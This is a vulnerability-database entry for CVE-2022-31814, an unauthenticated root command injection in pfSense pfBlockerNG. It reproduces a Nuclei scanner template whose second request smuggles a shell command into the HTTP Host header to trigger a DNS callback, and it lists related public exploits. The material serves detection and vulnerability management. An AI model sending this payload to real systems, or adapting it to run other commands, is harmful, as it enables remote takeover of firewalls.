Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-31814HistorySep 19, 2022 - 2:12 p.m.
pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection
2022-09-1914:12:25
ProjectDiscovery
github.com
17
cve
pfsense pfblockerng
packetstorm
remote code execution
netgate
os command injection
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.7
Confidence
High
EPSS
0.971
Percentile
99.8%
pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
id: CVE-2022-31814
info:
name: pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection
author: EvergreenCartoons
severity: critical
description: |
pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
remediation: |
Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability.
reference:
- https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
- https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
- https://github.com/EvergreenCartoons/SenselessViolence
- https://nvd.nist.gov/vuln/detail/CVE-2022-31814
- http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31814
cwe-id: CWE-78
epss-score: 0.97252
epss-percentile: 0.99847
cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*
metadata:
verified: true
max-request: 2
vendor: netgate
product: pfblockerng
framework: pfsense
tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate
http:
- raw:
- |+
GET /pfblockerng/www/index.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |+
GET /pfblockerng/www/index.php HTTP/1.1
Host: ' *; host {{interactsh-url}}; '
Accept: */*
unsafe: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "GIF")'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# digest: 490a00463044022061419438c8476d852bc22439b5c66b71568aad15d15612a46c47e36f01fe39480220765d71411609420dc5e405527ddf064c99aebf007b49df48f136a41430a61e30:922c64590222798bb761d5b6d8e72950Related
githubexploit
githubexploit
Exploit for OS Command Injection in Netgate Pfblockerng
2024-07-23 09:44:46
Exploit for OS Command Injection in Netgate Pfblockerng
2023-03-01 13:24:29
Exploit for OS Command Injection in Netgate Pfblockerng
2023-03-05 00:56:14
packetstorm
packetstorm
pfSense pfBlockerNG 2.1.4_26 Shell Upload
2022-10-17 00:00:00
pfBlockerNG 2.1.4_26 Remote Code Execution
2023-02-27 00:00:00
cvelist
cvelist
CVE-2022-31814
2022-09-05 00:00:00
CVE-2022-40624
2022-12-20 00:00:00
metasploit
metasploit
pfSense plugin pfBlockerNG unauthenticated RCE as root
2022-10-13 00:12:22
zdt
zdt
pfBlockerNG 2.1.4_26 - Remote Code Execution Exploit
2023-02-21 00:00:00
pfSense pfBlockerNG 2.1.4_26 Shell Upload Exploit
2022-10-17 00:00:00
exploitdb
exploitdb
pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
2023-02-20 00:00:00
cve
cve
CVE-2022-31814
2022-09-05 16:15:08
CVE-2022-40624
2022-12-20 15:15:11
prion
prion
Design/Logic Flaw
2022-09-05 16:15:00
Design/Logic Flaw
2022-12-20 15:15:00
nvd
nvd
CVE-2022-31814
2022-09-05 16:15:08
CVE-2022-40624
2022-12-20 15:15:11
vulnrichment
vulnrichment
CVE-2022-31814
2022-09-05 00:00:00
rapid7blog
rapid7blog
Metasploit Wrap-Up
2022-10-14 17:03:46
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.7
Confidence
High
EPSS
0.971
Percentile
99.8%
Related for NUCLEI:CVE-2022-31814